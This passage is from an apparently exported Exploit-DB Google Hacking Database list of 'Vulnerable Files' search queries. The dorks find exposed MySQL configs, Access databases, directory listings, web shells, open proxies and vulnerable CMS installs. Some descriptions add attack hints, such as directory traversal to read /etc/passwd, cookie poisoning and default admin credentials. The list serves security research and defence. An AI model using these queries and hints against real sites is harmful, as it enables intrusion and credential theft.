<shortDescription>filetype:cnf my.cnf -cvs -example</shortDescription>
<textualDescription>The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from pathes, databasenames up to passwords and usernames.Beware this search still gives false positives (examples, templates).</textualDescription>
<query>filetype:cnf my.cnf -cvs -example</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Acnf+my.cnf+-cvs+-example</querystring>
<edb></edb>
<date>2004-07-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>396</id>
<link>https://www.exploit-db.com/ghdb/396</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:inc inc intext:setcookie</shortDescription>
<textualDescription>Cookies are often used for authentication and a lot of other stuff.The &quot;inc&quot; php header files often include the exact syntax of the cookies. An attacker may create his own cookie with the information he has taken from the header file and start cookie poisining.</textualDescription>
<query>filetype:inc inc intext:setcookie</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Ainc+inc+intext%3Asetcookie</querystring>
<edb></edb>
<date>2004-08-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>479</id>
<link>https://www.exploit-db.com/ghdb/479</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:lit lit (books|ebooks)</shortDescription>
<textualDescription>Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)</textualDescription>
<query>filetype:lit lit (books|ebooks)</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Alit+lit+%28books%7Cebooks%29</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1045</id>
<link>https://www.exploit-db.com/ghdb/1045</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:mdb &quot;standard jet&quot;</shortDescription>
<textualDescription>These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data.</textualDescription>
<query>filetype:mdb &quot;standard jet&quot; (password | username | user | pass)</query>
<querystring>https://www.google.com/search?q=filetype%3Amdb+%22standard+jet%22+%28password+%7C+username+%7C+user+%7C+pass%29</querystring>
<edb></edb>
<date>2005-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>730</id>
<link>https://www.exploit-db.com/ghdb/730</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:mdb inurl:&quot;news/news&quot;</shortDescription>
<textualDescription>Web Wiz Site News unprotected database holds config and admin information in a microsoft access database in news/news.mdb. This information is almost always unprotected.</textualDescription>
<query>filetype:mdb inurl:&quot;news/news&quot;</query>
<querystring>https://www.google.com/search?q=filetype:mdb+inurl:%22news/news%22</querystring>
<edb></edb>
<date>2004-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>289</id>
<link>https://www.exploit-db.com/ghdb/289</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:php inurl:&quot;viewfile&quot; -&quot;index.php&quot; -&quot;idfil</shortDescription>
<textualDescription>Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --&gt; will show you the my_howto.txt).An attacker can check for buggy php scripts wich allow you to view any file on the system (with webservers permissions). Try the good, old directory traversal trick: &quot;../../../&quot;. You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?).</textualDescription>
<query>filetype:php inurl:&quot;viewfile&quot; -&quot;index.php&quot; -&quot;idfil</query>
<querystring>https://www.google.com/search?q=filetype%3Aphp+inurl%3A%22viewfile%22+-%22index.php%22+-%22idfil&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>734</id>
<link>https://www.exploit-db.com/ghdb/734</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:pl -intext:&quot;/usr/bin/perl&quot; inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)</shortDescription>
<textualDescription>WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. The file names explain themselves, but don't abuse the faulty admins.</textualDescription>
<query>filetype:pl -intext:&quot;/usr/bin/perl&quot; inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Apl+-intext%3A%22%2Fusr%2Fbin%2Fperl%22+inurl%3Awebcal+%28inurl%3Awebcal+%7C+inurl%3Aadd+%7C+inurl%3Adelete+%7C+inurl%3Aconfig%29</querystring>
<edb></edb>
<date>2004-12-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>395</id>
<link>https://www.exploit-db.com/ghdb/395</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:wsdl wsdl</shortDescription>
<textualDescription>The XML headers are called *.wsdl files.they can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff.</textualDescription>
<query>filetype:wsdl wsdl</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Awsdl+wsdl</querystring>
<edb></edb>
<date>2004-08-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>470</id>
<link>https://www.exploit-db.com/ghdb/470</link>
<category>Vulnerable Files</category>
<shortDescription>Gallery configuration setup files</shortDescription>
<textualDescription>Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.We call it Gallery in Setup mode :)</textualDescription>
<query>intitle:gallery inurl:setup &quot;Gallery configuration&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3Agallery+inurl%3Asetup+%22Gallery+configuration%22</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>7321</id>
<link>https://www.exploit-db.com/ghdb/7321</link>
<category>Vulnerable Files</category>
<shortDescription>Google Dork: intitle:&quot;index of&quot; &quot;/sql&quot; &quot;admin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/sql&quot; &quot;admin&quot;
#Description: This Dork will return the important files containing admin setup to sql.
#Date: 21/09/2021.
#Exploit Author: Bon Sai</textualDescription>
<query>Google Dork: intitle:&quot;index of&quot; &quot;/sql&quot; &quot;admin&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: intitle:&quot;index of&quot; &quot;/sql&quot; &quot;admin&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Bon Sai</author>
</entry>
<entry>
<id>6246</id>
<link>https://www.exploit-db.com/ghdb/6246</link>
<category>Vulnerable Files</category>
<shortDescription>index of admin/fckeditor/editor/filemanager/</shortDescription>
<textualDescription>Dork: index of admin/fckeditor/editor/filemanager/
Description: will show some login and juicy information related to parent directory and details
Author: Priyanka Prasad
</textualDescription>
<query>index of admin/fckeditor/editor/filemanager/</query>
<querystring>https://www.google.com/search?q=index of admin/fckeditor/editor/filemanager/</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Priyanka Prasad</author>
</entry>
<entry>
<id>6271</id>
<link>https://www.exploit-db.com/ghdb/6271</link>
<category>Vulnerable Files</category>
<shortDescription>index.of.?.frm</shortDescription>
<textualDescription>Dork: index.of.?.frm
Description: This google dorks lists out sensitive frm files on web servers
Author: Abhi Chitkara
</textualDescription>
<query>index.of.?.frm</query>
<querystring>https://www.google.com/search?q=index.of.?.frm</querystring>
<edb></edb>
<date>2020-06-11</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7402</id>
<link>https://www.exploit-db.com/ghdb/7402</link>
<category>Vulnerable Files</category>
<shortDescription>intext:&quot;powered by BlueCMS v1.6&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;powered by BlueCMS v1.6&quot;
# Vulnerable Files
# Date: 10-06-2021
# Author: Rahul B Pallickal
# Description: Google Dork to find the pages vulnerable to CVE-2020-19853</textualDescription>
<query>intext:&quot;powered by BlueCMS v1.6&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;powered by BlueCMS v1.6&quot;</querystring>
<edb></edb>
<date>2021-10-08</date>
<author>Rahul B Pallickal</author>
</entry>
<entry>
<id>7312</id>
<link>https://www.exploit-db.com/ghdb/7312</link>
<category>Vulnerable Files</category>
<shortDescription>intitle: Index of /assets/admin/system</shortDescription>
<textualDescription># Google Dork: intitle: Index of /assets/admin/system
# Vulnerable Files
# Date: 12/09/2021
# Exploit Author: Romell Marin Cordoba</textualDescription>
<query>intitle: Index of /assets/admin/system</query>
<querystring>https://www.google.com/search?q=intitle: Index of /assets/admin/system</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>585</id>
<link>https://www.exploit-db.com/ghdb/585</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;ASP FileMan&quot; Resend -site:iisworks.com</shortDescription>
<textualDescription>FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database. Default user: user=admin, pass=passIn the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.Site admins have been notified. As always: DO NOT ABUSE THIS.</textualDescription>
<query>intitle:&quot;ASP FileMan&quot; Resend -site:iisworks.com</query>
<querystring>https://www.google.com/search?q=intitle:%22ASP+FileMan%22+Resend+-site:iisworks.com&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1172</id>
<link>https://www.exploit-db.com/ghdb/1172</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;CJ Link Out V1&quot;</shortDescription>
<textualDescription>A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site. The vulnerability report can be found at http://secunia.com/advisories/16970/ .</textualDescription>
<query>intitle:&quot;CJ Link Out V1&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;q=intitle%3A%22CJ+Link+Out+V1%22</querystring>
<edb></edb>
<date>2005-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1139</id>
<link>https://www.exploit-db.com/ghdb/1139</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;Control panel&quot; &quot;Control Panel Login&quot; ArticleLive inurl:admin -demo</shortDescription>
<textualDescription>Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.Authentication bypass, sql injections and xss in ArticleLive 2005http://neworder.box.sk/explread.php?newsid=13582</textualDescription>
<query>intitle:&quot;Control panel&quot; &quot;Control Panel Login&quot; ArticleLive inurl:admin -demo</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Control+panel%22+%22Control+Panel+Login%22+ArticleLive+inurl%3Aadmin+-demo&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>565</id>
<link>https://www.exploit-db.com/ghdb/565</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;Directory Listing&quot; &quot;tree view&quot;</shortDescription>
<textualDescription>Dirlist is an ASP script that list folders in an explorer style: * Tree * Detailed * Tiled Quote: *Lists files and directories in either a Tree, Detailed, or Tiled view. *Can set a &quot;Starting Directory&quot;. This can be a IIS Virtual Directory path. *Displays file and directory properties. *Can specify directories which you do not want to display and access. *Can specify directories which you only want to display and access. *Can specify what file-types to only display. *Displays custom file-type icons. This can be turned off in the settings. * 'Detailed' and 'tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings.</textualDescription>
<query>intitle:&quot;Directory Listing&quot; &quot;tree view&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Directory+Listing%22+%22tree+view%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>284</id>
<link>https://www.exploit-db.com/ghdb/284</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;Index of /&quot; modified php.exe</shortDescription>
<textualDescription>PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting &quot;/php/php.exe?c:\boot.ini.&quot;</textualDescription>
<query>intitle:&quot;Index of /&quot; modified php.exe</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Index+of+%2F%22+modified+php.exe</querystring>
<edb></edb>
<date>2004-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>7786</id>
<link>https://www.exploit-db.com/ghdb/7786</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.php&quot;
# Vulnerable Files
# Date: 12/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.php&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7784</id>
<link>https://www.exploit-db.com/ghdb/7784</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.phtml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.phtml&quot;
# Vulnerable Files
# Date: 12/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.phtml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.phtml&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>8270</id>
<link>https://www.exploit-db.com/ghdb/8270</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.phtml&quot; site:.edu</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.phtml&quot; site:.edu
# Vulnerable Files
# Date: 20/10/2023
# Exploit Author: Ali Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.phtml&quot; site:.edu</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.phtml&quot; site:.edu</querystring>
<edb></edb>
<date>2023-10-20</date>
<author>Ali Ahamed</author>
</entry>
<entry>
<id>7783</id>
<link>https://www.exploit-db.com/ghdb/7783</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.pl&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.pl&quot;
# Vulnerable Files
# Date: 12/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.pl&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.pl&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7350</id>
<link>https://www.exploit-db.com/ghdb/7350</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/cgi-bin&quot; &quot;admin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/cgi-bin&quot; &quot;admin&quot;
# Vulnerable Files
# Date: 30/09/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/cgi-bin&quot; &quot;admin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/cgi-bin&quot; &quot;admin&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7595</id>
<link>https://www.exploit-db.com/ghdb/7595</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;master03.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;master03.xml&quot;
# Vulnerable Files
# Date:03/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;master03.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;master03.xml&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6251</id>
<link>https://www.exploit-db.com/ghdb/6251</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;nrpe.cfg&quot;</shortDescription>
<textualDescription>*intitle:&quot;index of&quot; &quot;nrpe.cfg&quot;*
This dork helps to view sensitive information by pulling NRPE config file
which is used for Nagios monitoring. This file can contain password for
customized plugins and can also reveal internal IPs.
Please find the attached txt file containing details.
Thanks and Regards
Anurag Muley
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;nrpe.cfg&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;nrpe.cfg&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Anurag Muley</author>
</entry>
<entry>
<id>7597</id>
<link>https://www.exploit-db.com/ghdb/7597</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;pres.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;pres.xml&quot;
# Vulnerable Files
# Date: 03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;pres.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;pres.xml&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7197</id>
<link>https://www.exploit-db.com/ghdb/7197</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;schema.sql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;schema.sql&quot;
# Vulnerable Files
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;schema.sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;schema.sql&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7596</id>
<link>https://www.exploit-db.com/ghdb/7596</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;index of&quot; &quot;stylesheet.css&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;stylesheet.css&quot;
# Vulnerale Files
# Date: 03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;stylesheet.css&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;stylesheet.css&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7724</id>
<link>https://www.exploit-db.com/ghdb/7724</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;Index of&quot; site:.in</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; site:.in
# Vulnerable Files
# Date: 09/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;Index of&quot; site:.in</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; site:.in</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>439</id>
<link>https://www.exploit-db.com/ghdb/439</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;PHP Explorer&quot; ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)</shortDescription>
<textualDescription>This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them).</textualDescription>
<query>intitle:&quot;PHP Explorer&quot; ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22PHP+Explorer%22+ext%3Aphp+%28inurl%3Aphpexplorer.php+%7C++inurl%3Alist.php+%7C+inurl%3Abrowse.php%29</querystring>
<edb></edb>
<date>2004-08-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>615</id>
<link>https://www.exploit-db.com/ghdb/615</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;phpremoteview&quot; filetype:php &quot;Name, Size, Type, Modify&quot;</shortDescription>
<textualDescription>phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the server filesystem use the online php interpreter.vendor: http://php.spb.ru/remview/ (russian)</textualDescription>
<query>intitle:&quot;phpremoteview&quot; filetype:php &quot;Name, Size,</query>
<querystring>https://www.google.com/search?q=intitle%3A%22phpremoteview%22+filetype%3Aphp+%22Name%2C+Size%2C+Type%2C+Modify%22</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1002</id>
<link>https://www.exploit-db.com/ghdb/1002</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;PHPstat&quot; intext:&quot;Browser&quot; intext:&quot;PHPstat setup&quot;</shortDescription>
<textualDescription>Phpstat shows nice statistical informatino about a website's visitors. Certain versions are also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt</textualDescription>
<query>intitle:&quot;PHPstat&quot; intext:&quot;Browser&quot; intext:&quot;PHPstat setup&quot;</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3A%22PHPstat%22+intext%3A%22Browser%22+intext%3A%22PHPstat+setup%22</querystring>
<edb></edb>
<date>2005-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>984</id>
<link>https://www.exploit-db.com/ghdb/984</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:&quot;SSHVnc Applet&quot;OR intitle:&quot;SSHTerm Applet&quot; -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com</shortDescription>
<textualDescription>sSHTerm Applet en SSHVnc Applet pages.</textualDescription>
<query>intitle:&quot;SSHVnc Applet&quot;OR intitle:&quot;SSHTerm Applet&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22SSHVnc+Applet%22OR+intitle:%22SSHTerm+Applet%22+-uni-klu.ac.at+-net/viewcvs.py+-iphoting.iphoting.com&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>7870</id>
<link>https://www.exploit-db.com/ghdb/7870</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:index.of.etc</shortDescription>
<textualDescription># Google Dork: intitle:index.of.etc
# Vulnerable Files
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:index.of.etc</query>
<querystring>https://www.google.com/search?q=intitle:index.of.etc</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>568</id>
<link>https://www.exploit-db.com/ghdb/568</link>
<category>Vulnerable Files</category>
<shortDescription>intitle:mywebftp &quot;Please enter your password&quot;</shortDescription>
<textualDescription>MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable.</textualDescription>
<query>intitle:mywebftp &quot;Please enter your password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:mywebftp+%22Please+enter+your+password%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>535</id>
<link>https://www.exploit-db.com/ghdb/535</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:&quot; WWWADMIN.PL&quot; intitle:&quot;wwwadmin&quot;</shortDescription>
<textualDescription>wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum.</textualDescription>
<query>inurl:&quot; WWWADMIN.PL&quot; intitle:&quot;wwwadmin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22+WWWADMIN.PL%22+intitle:%22wwwadmin%22&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-10-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>466</id>
<link>https://www.exploit-db.com/ghdb/466</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:&quot;nph-proxy.cgi&quot; &quot;Start browsing through this CGI-based proxy&quot;</shortDescription>
<textualDescription>Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.Luckily google gives them another option, if they are smart enough to find it.CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.CGI-proxy's default page contains the text, as you can see in the demo on their site:&quot;Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine.&quot;The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:inurl:&quot;nph-proxy.cgi&quot; &quot;Start browsing through this CGI-based proxy&quot;More results can be obtained by admitting the &quot;inurl:nph-proxy.cgi&quot; constraint, but much more trash is generated as well.</textualDescription>
<query>inurl:&quot;nph-proxy.cgi&quot; &quot;Start browsing through this CGI-based proxy&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22nph-proxy.cgi%22+%22Start+browsing+through+this+CGI-based+proxy%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-09-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>458</id>
<link>https://www.exploit-db.com/ghdb/458</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:&quot;plog/register.php&quot;</shortDescription>
<textualDescription>pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:&quot;If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php.&quot;This search finds that register.php form of course :)Below is some more general information about pLog.Vendor site: hxxp://www.plogworld.org/Admin portals http://sitename/plog/admin.phpInstallation wizard: http://sitename/plog/wizard.phpConfig file (mysql db pass): http://sitename/plog/config/config.properties.phpTemp files: http://sitename/plog/tmp/Gallery files: http://sitename/plog/gallery/Blog search engine: http://www.plogworld.org/ploogle/</textualDescription>
<query>inurl:&quot;plog/register.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22plog%2Fregister.php%22</querystring>
<edb></edb>
<date>2004-09-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1412</id>
<link>https://www.exploit-db.com/ghdb/1412</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:&quot;simplenews/admin&quot;</shortDescription>
<textualDescription>hxxp://evuln.com/vulns/94/summary.html</textualDescription>
<query>inurl:&quot;simplenews/admin&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22simplenews%2Fadmin%22</querystring>
<edb></edb>
<date>2006-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7760</id>
<link>https://www.exploit-db.com/ghdb/7760</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;</shortDescription>
<textualDescription># Google Dork: inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;
# Vulnerable Files
# Date: 10/11/2021
# Exploit Author: Leonardo Venegas</textualDescription>
<query>inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Leonardo Venegas</author>
</entry>
<entry>
<id>7891</id>
<link>https://www.exploit-db.com/ghdb/7891</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:.com index of movies</shortDescription>
<textualDescription># Google Dork: inurl:.com index of movies
# Vulnerable Files
# Date: 18/12/2021
# Exploit Author: Ved Kolambkar
</textualDescription>
<query>inurl:.com index of movies</query>
<querystring>https://www.google.com/search?q=inurl:.com index of movies</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Ved Kolambkar</author>
</entry>
<entry>
<id>7317</id>
<link>https://www.exploit-db.com/ghdb/7317</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:/supportboard</shortDescription>
<textualDescription># Google Dork: inurl:/supportboard
# Vulnerable Files
# Date:16/09/2021
# Exploit Author: Jamal Lalaoui
# CVE: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)</textualDescription>
<query>inurl:/supportboard</query>
<querystring>https://www.google.com/search?q=inurl:/supportboard</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Jamal Lalaoui</author>
</entry>
<entry>
<id>1138</id>
<link>https://www.exploit-db.com/ghdb/1138</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:cartwiz/store/index.asp</shortDescription>
